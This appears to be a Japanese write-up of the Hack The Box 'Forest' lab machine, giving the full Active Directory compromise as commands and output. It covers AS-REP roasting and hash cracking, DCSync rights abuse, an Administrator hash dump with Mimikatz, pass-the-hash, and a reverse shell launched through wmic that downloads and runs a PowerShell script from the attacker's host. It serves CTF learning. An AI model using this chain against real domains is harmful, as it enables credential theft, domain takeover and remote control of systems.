はじめに
Hack The Box(https://www.hackthebox.eu/)のForestに取り組んだときのwriteupです。
なるべくWindows環境で頑張ってみましたが、一部Linux(Kali)環境でしか実行できなさそうなところがありました。当該部分のうち、Windows環境でもできる部分があれば教えていただきたいです。
操作を実行したOS(Kali or Win)については各見出しに記載しています。
手順
- 標的サーバ: 10.10.10.161
(Kali)ポートスキャン
nmapを使用した。
分かったことは以下。
- FQDN: FOREST.htb.local
- AD環境が存在
- ドメイン名: htb.local(HTB)
- 標的サーバはドメインコントローラ(DC)
- 主な開きポート: 下記参照
nmap実行結果
$ nmap 10.10.10.161 -A -v -Pn -n
(snip)
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-08 13:40:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
(snip)
Host script results:
|_clock-skew: mean: 2h28m45s, deviation: 4h02m30s, median: 8m45s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2020-03-08T06:43:11-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-08 09:43:12
|_ start_date: 2020-03-08 09:25:00
(snip)
(Kali)ユーザ列挙
enum4linuxを使用した。
分かったことは以下(関係ありそうなものだけ抜粋)。
- 下記のユーザが存在(主なもの)
| ユーザID | 所属グループ |
|---|---|
| Administrator | Domain Admins, Group Policy Creator Owners, Domain Users, Schema Admins, Enterprise Admins |
| krbtgt | Domain Users |
| sebastien | Domain Users |
| lucinda | Domain Users |
| svc-alfresco | Domain Users, Service Accounts |
| andy | Domain Users |
| mark | Domain Users |
| santi | Domain Users |
enum4linux実行結果
$ enum4linux 10.10.10.161
(snip)
==========================
| Target Information |
==========================
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
(snip)
===========================================
| Getting domain SID for 10.10.10.161 |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
(snip)
=============================
| Users on 10.10.10.161 |
=============================
(snip)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
(snip)
==============================
| Groups on 10.10.10.161 |
==============================
[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]
(snip)
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
(snip)
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
(snip)
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Exchange Windows Permissions' (RID: 1121) has member: HTB\Exchange Trusted Subsystem
Group 'Domain Users' (RID: 513) has member: HTB\Administrator
Group 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
Group 'Domain Users' (RID: 513) has member: HTB\krbtgt
(snip)
Group 'Domain Users' (RID: 513) has member: HTB\sebastien
Group 'Domain Users' (RID: 513) has member: HTB\lucinda
Group 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group 'Domain Users' (RID: 513) has member: HTB\andy
Group 'Domain Users' (RID: 513) has member: HTB\mark
Group 'Domain Users' (RID: 513) has member: HTB\santi
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Schema Admins' (RID: 518) has member: HTB\Administrator
Group 'Domain Admins' (RID: 512) has member: HTB\Administrator
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Domain Computers' (RID: 515) has member: HTB\EXCH01$
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Group Policy Creator Owners' (RID: 520) has member: HTB\Administrator
Group '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: HTB\EXCH01$
Group 'Domain Guests' (RID: 514) has member: HTB\Guest
Group 'Managed Availability Servers' (RID: 1120) has member: HTB\EXCH01$
Group 'Managed Availability Servers' (RID: 1120) has member: HTB\Exchange Servers
Group 'Organization Management' (RID: 1104) has member: Could not connect to server 10.10.10.161
Group 'Organization Management' (RID: 1104) has member: Connection failed: NT_STATUS_IO_TIMEOUT
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
Group 'Exchange Servers' (RID: 1118) has member: HTB\EXCH01$
Group 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
(snip)
(Kali)Kerberos関連調査
取得できたユーザのリストと、既知のパスワードリストを使ってkerbrute.pyにより認証を試行した。
パスワードリストには500-worst-passwords.txtを使用した。
試行開始直後、svc-alfrescoユーザについて事前認証を必要としない(NOT PREAUTH)ことが分かった。
また、全ユーザに対する認証試行には長時間かかることが予測されたため、svc-alfrescoユーザに対してAS-REP Roast(参照先[1])を試行することにした。
ユーザリスト
$ cat ./users.txt
Administrator
krbtgt
sebastien
lucinda
svc-alfresco
andy
mark
santi
kerbrute.py実行結果
$ python3 kerbrute.py -users ./users.txt -passwords ./500-worst-passwords.txt -domain htb.local -dc-ip 10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Blocked/Disabled user => krbtgt
[*] Valid user => sebastien
[*] Valid user => lucinda
[*] Valid user => svc-alfresco [NOT PREAUTH]
[*] Valid user => andy
[*] Valid user => mark
[*] Valid user => santi
(Kali, Win)AS-REP Roast
GetNPUsers.pyを使用して、HTB\svc-alfrescoユーザのAS-REP Hashを取得した。
HTB\svc-alfrescoユーザのAS-REPHash取得
$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py htb.local/svc-alfresco -no-pass -dc-ip 10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:bf1e1fb69134c44ef3668f6c4f18cac3$ff2b5ee128d9560d8a2b068f5ce6ca0e678b9442294769587e45d97ae08548a0837ccf47699a0ed350f1d6630b0e5a2d2f32b26b028a0497e2b40f2d35cf31eeaf864dd7952dce3ebf90dfba11a60ef9158a0be084c2d237f29b96b08ec5e9f52f9770fe2b97f4f08f4a5910e1f70c59b90b2a31c5139e2d9564e9a73c662b6308896e58d0197b7f43dded415339bfd79be705fbda07e550630f80f7a600fb289dd781869d8d2b0facf8ef6a068f80c91d42692397a6ca069eae559ff110de531a90124734db709b290ffb50c612909e9a760b2cb3fe83219a66e453e3261a72c615337405da
hashcatを使用して、上記で取得したAS-REP Hashに対してパスワード解析を実行した。
パスワードリストには、Kaliに入っていたrockyou.txtを使用した。
実行の結果、HTB\svc-alfrescoユーザのパスワードがs3rviceであることが分かった。
以降は、ここで取得できた認証情報(ID: HTB\svc-alfresco, pass: s3rvice)を使用していく。
HTB\svc-alfrescoユーザのパスワード解析
> .\hashcat64.exe -m 18200 -a 0 -O .\hash_alfresco.txt .\rockyou.txt
(snip)
$krb5asrep$23$svc-alfresco@HTB.LOCAL:bf1e1fb69134c44ef3668f6c4f18cac3$ff2b5ee128d9560d8a2b068f5ce6ca0e678b9442294769587e45d97ae08548a0837ccf47699a0ed350f1d6630b0e5a2d2f32b26b028a0497e2b40f2d35cf31eeaf864dd7952dce3ebf90dfba11a60ef9158a0be084c2d237f29b96b08ec5e9f52f9770fe2b97f4f08f4a5910e1f70c59b90b2a31c5139e2d9564e9a73c662b6308896e58d0197b7f43dded415339bfd79be705fbda07e550630f80f7a600fb289dd781869d8d2b0facf8ef6a068f80c91d42692397a6ca069eae559ff110de531a90124734db709b290ffb50c612909e9a760b2cb3fe83219a66e453e3261a72c615337405da:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:bf1e1fb69134c4...7405da
Time.Started.....: Mon Mar 09 11:52:46 2020 (1 sec)
Time.Estimated...: Mon Mar 09 11:52:47 2020 (0 secs)
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 10231.9 kH/s (6.85ms) @ Accel:512 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4916264/14344384 (34.27%)
Rejected.........: 1064/4916264 (0.02%)
Restore.Point....: 3933082/14344384 (27.42%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: se7ven1985 -> omarcito23
Hardware.Mon.#1..: Temp: 48c Util: 13% Core: 960MHz Mem:6801MHz Bus:16
(Win)高権限ユーザの調査
htb.localドメインにおいて高い権限を持つ(AdminCount = 1)ユーザを列挙した。
その結果、先ほど取得したHTB\svc-alfrescoユーザは高権限ユーザであることが分かった。
なお、ここではADModuleを使用している。
HTB\svc-alfrescoユーザとしてpowershell.exeを起動
> runas /netonly /user:HTB\svc-alfresco powershell.exe
HTB\svc-alfresco のパスワードを入力してください:
powershell.exe をユーザー "HTB\svc-alfresco" として開始しています...
高権限ユーザの列挙(HTB\svc-alfrescoとして実行)
> Import-Module .\ADModule-master\Microsoft.ActiveDirectory.Management.dll
> Import-Module .\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
> Get-ADObject -Filter {AdminCount -eq 1} -Server forest.htb.local
DistinguishedName Name ObjectClass ObjectGUID
----------------- ---- ----------- ----------
CN=Read-only Domain Controllers,CN=Users,DC=htb,DC=local Read-only Domain Controllers group b33b7263-e2e2-4014-a7fc-fdd641d27919
CN=Administrator,CN=Users,DC=htb,DC=local Administrator user a8133c53-217c-40e2-81cb-887e0f61bdb0
CN=krbtgt,CN=Users,DC=htb,DC=local krbtgt user 4e6893d1-0f65-446c-aa8c-315b78ccf9bc
CN=Domain Controllers,CN=Users,DC=htb,DC=local Domain Controllers group f0057b04-7993-49ba-af49-93006469db51
CN=Schema Admins,CN=Users,DC=htb,DC=local Schema Admins group 5ac47aae-ea30-4392-91ed-ca3f6fa4a3c0
CN=Enterprise Admins,CN=Users,DC=htb,DC=local Enterprise Admins group 1d4f5503-50ac-44fc-8d9f-fd7cede17a33
CN=Domain Admins,CN=Users,DC=htb,DC=local Domain Admins group 7276b065-f6d1-4c04-b091-25ffa1cf9abf
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local svc-alfresco user 58a51302-4c7c-4686-9502-d3ada3afaef1
CN=Service Accounts,OU=Security Groups,DC=htb,DC=local Service Accounts group 8b287cd5-8692-484c-bbe7-03ab3764d060
CN=Privileged IT Accounts,OU=Security Groups,DC=htb,DC=local Privileged IT Accounts group be8fee5e-79fa-4b5b-aea5-79222caf26b9
CN=Account Operators,CN=Builtin,DC=htb,DC=local Account Operators group a7a4d8b8-3ba8-40f8-9dfd-879bfd6a4964
CN=Administrators,CN=Builtin,DC=htb,DC=local Administrators group 40b6508d-2756-4d63-a2fd-05336a6f335d
CN=Print Operators,CN=Builtin,DC=htb,DC=local Print Operators group 21429604-27ba-44a8-9676-6e4f0338ecc8
CN=Backup Operators,CN=Builtin,DC=htb,DC=local Backup Operators group 394bc784-6a8b-4406-9a69-5593f3c93bd8
CN=Replicator,CN=Builtin,DC=htb,DC=local Replicator group 081a0378-3e5a-4270-9eec-538ff44eb891
CN=Server Operators,CN=Builtin,DC=htb,DC=local Server Operators group 825c599e-0c08-4909-9421-9de73ded4fdb
(Win)権限昇格の可否の調査
enum4linuxの実行結果より、htb.localドメインにはExchange Windows Permissionsグループが存在していることが分かっている。
念のためADModuleのGet-ADGroupコマンドを使って確認してみる。
ExchangeWindowsPermissionsグループの存在確認(HTB\svc-alfrescoとして実行)
> Get-ADGroup -Server forest.htb.local -Filter * | select name
name
----
Administrators
Users
Guests
(snip)
Exchange Windows Permissions
(snip)
Exchange Windows PermissionsグループにExtended RightとしてDs-Replication-Get-ChangesとDs-Replication-Get-Changes-Allを追加することでDCSyncが実行できるようになることが分かっている。(参照先[2])
そこで、下記手順によりDCSyncを実行してみる。
- 新規ユーザ(HTB\hoge)を追加する
- HTB\hogeユーザを
Exchange Windows Permissionsグループに所属させる - HTB\hogeユーザのExtended Rightとして
Ds-Replication-Get-ChangesとDs-Replication-Get-Changes-Allを追加する - HTB\hogeユーザ権限でDCSyncを実行する
(Win)ユーザ追加、所属グループ・権限追加
HTB\svc-alfrescoユーザ権限で新規ユーザを追加する。
新規ユーザ追加(HTB\svc-alfrescoとして実行)
> Import-Module .\ADModule-master\Microsoft.ActiveDirectory.Management.dll
> Import-Module .\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
> $pwd=ConvertTo-SecureString "hogehoge" -AsPlainText -Force
> New-ADUser hoge -Server forest.htb.local -AccountPassword $pwd -Enabled $true
HTB\hogeユーザをExchange Windows Permissionsグループに所属させる
所属グループ追加(HTB\svc-alfrescoとして実行)
> Add-ADGroupMember -Server forest.htb.local -Identity 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=htb,DC=local' hoge
HTB\hogeユーザに高権限(AdminCount = 1)を設定する
高権限追加(HTB\svc-alfrescoとして実行)
> Set-ADUser -Identity hoge -Replace @{adminCount=1} -Server forest.htb.local
PowerView_dev.ps1を使用し、HTB\hogeユーザのExtended RightとしてDs-Replication-Get-ChangesとDs-Replication-Get-Changes-Allを追加する。
以降はHTB\hogeユーザを使用する。
HTB\hogeユーザとしてpowershell.exeを起動
> runas /netonly /user:HTB\hoge powershell.exe
HTB\hoge のパスワードを入力してください:
powershell.exe をユーザー "HTB\hoge" として開始しています...
ExtendedRight追加(HTB\hogeとして実行)
> . .\PowerView_dev.ps1
> Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -Rights DCSync -TargetDomain htb.local -PrincipalDomain htb.local -PrincipalIdentity hoge -DomainController forest.htb.local -Verbose
詳細: [Get-DomainSearcher] search base: LDAP://forest.htb.local/DC=htb,DC=local
詳細: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=hoge)(name=hoge)(displayname=hoge))))
詳細: [Get-DomainSearcher] search base: LDAP://forest.htb.local/DC=htb,DC=local
詳細: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=DC=htb,DC=local)))
詳細: [Add-DomainObjectAcl] Granting principal CN=hoge,CN=Users,DC=htb,DC=local 'DCSync' on DC=htb,DC=local
詳細: [Add-DomainObjectAcl] Granting principal CN=hoge,CN=Users,DC=htb,DC=local rights GUID
'1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' on DC=htb,DC=local
詳細: [Add-DomainObjectAcl] Granting principal CN=hoge,CN=Users,DC=htb,DC=local rights GUID
'1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' on DC=htb,DC=local
詳細: [Add-DomainObjectAcl] Granting principal CN=hoge,CN=Users,DC=htb,DC=local rights GUID
'89e95b76-444d-4c62-991a-0facbeda640c' on DC=htb,DC=local
(Win)DCSync実行
Mimikatzを利用してDCSyncを実行する。
DCSync実行(HTB\hogeとして実行)
> . .\Invoke-Mimikatz.ps1
> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:htb.local /user:administrator"'
.#####. mimikatz 2.2.0 (x64) #18362 May 30 2019 09:58:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::dcsync /domain:htb.local /user:administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
User Principal Name : Administrator@htb.local
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration : 1601/01/01 9:00:00
Password last change : 2019/09/19 2:09:08
Object Security ID : S-1-5-21-3072663084-364016917-1341370565-500
Object Relative ID : 500
Credentials:
Hash NTLM: 32693b11e6aa90eb43d32c72a07ceea6
(Win)Pass The Hash実行、フラグ取得
取得したHTB\AdministratorのNTLMハッシュを利用してPass The Hashを行い、powershell.exeを起動する。
PassTheHash実行(ローカル管理者として実行)
> . .\Invoke-Mimikatz.ps1
> Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:htb.local /ntlm:32693b11e6aa90eb43d32c72a07ceea6 /run:powershell.exe"'
.#####. mimikatz 2.2.0 (x64) #18362 May 30 2019 09:58:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # sekurlsa::pth /user:administrator /domain:htb.local /ntlm:32693b11e6aa90eb43d32c72a07ceea6 /run:powershell.exe
user : administrator
domain : htb.local
program : powershell.exe
impers. : no
NTLM : 32693b11e6aa90eb43d32c72a07ceea6
| PID 5208
| TID 4580
| LSA Process is now R/W
| LUID 0 ; 2390802 (00000000:00247b12)
\_ msv1_0 - data copy @ 0000014D97AC7280 : OK !
\_ kerberos - data copy @ 0000014D9745DE68
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 0000014D97AB49F8 (32) -> null
起動したpowershell.exeからフラグを取得する。
フラグ取得(HTB\Administratorとして実行)
> ls \\forest.htb.local\c$\Users\
ディレクトリ: \\forest.htb.local\c$\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2019/09/19 2:09 Administrator
d-r--- 2016/11/21 11:39 Public
d----- 2019/09/23 7:29 sebastien
d----- 2019/09/23 8:02 svc-alfresco
> cat '\\forest.htb.local\c$\Users\svc-alfresco\Desktop\user.txt'
> cat '\\forest.htb.local\c$\Users\Administrator\Desktop\root.txt'
(Win)リバースシェル実行
リバースシェルが取れるかどうか試してみる。
実行には下記のツールを使用した。
Invoke-PowerShellTcp.ps1の末尾に下記の最終行を追加して保存(Invoke-PowerShellTcpEx.ps1)し、Webサーバ的なサービスで外部に公開する。
Invoke-PowerShellTcpEx.ps1
(snip)
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress (自分のIP) -Port 9999
powercatで接続を待ち受ける。
接続待ち受け(適当なユーザで実行)
> powercat -v -l -p 9999 -t 2000
詳細: Set Stream 1: TCP
詳細: Set Stream 2: Console
詳細: Setting up Stream 1...
詳細: Listening on [0.0.0.0] (port 9999)
forest.htb.localに対してWMI経由でpowershellを実行し、Invoke-PowerShellTcpEx.ps1を取得・実行させる。
wmi経由でpowershell実行(HTB\Administratorとして実行)
> wmic /node:10.10.10.161 process call create "powershell.exe -NoP -sta -NonI -W Hidden iex (New-Object Net.WebClient).DownloadString('http://(自分のIP)/Invoke-PowerShellTcpEx.ps1')"
(Win32_Process)->Create() を実行しています
メソッドが正しく実行しました。
出力パラメーター
instance of __PARAMETERS
{
ProcessId = 2964;
ReturnValue = 0;
};
リバースシェルが起動する。
リバースシェル起動(適当なユーザで実行)
> powercat -v -l -p 9999 -t 2000
詳細: Set Stream 1: TCP
詳細: Set Stream 2: Console
詳細: Setting up Stream 1...
詳細: Listening on [0.0.0.0] (port 9999)
詳細: Connection from [10.10.10.161] port [tcp] accepted (source port 62903)
詳細: Setting up Stream 2...
詳細: Both Communication Streams Established. Redirecting Data Between Streams...
Windows PowerShell running as user Administrator on FOREST
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> hostname
FOREST
PS C:\Windows\system32> whoami
htb\administrator
おわりに
Hack The Boxのお作法に従わず、管理者権限取得まで行った後でユーザフラグも取得しました。
自分より前にフラグを取得していた某Guruによると、別に新規ユーザを追加しなくてもいけたそうなのですが、自分は他のプレイヤーにあまり影響を与えたくなかったので新規ユーザを追加しました(どっちもどっちかもしれませんが)。
参照先
[1] Roasting AS-REPs
[2] Domain object DACL privilege escalation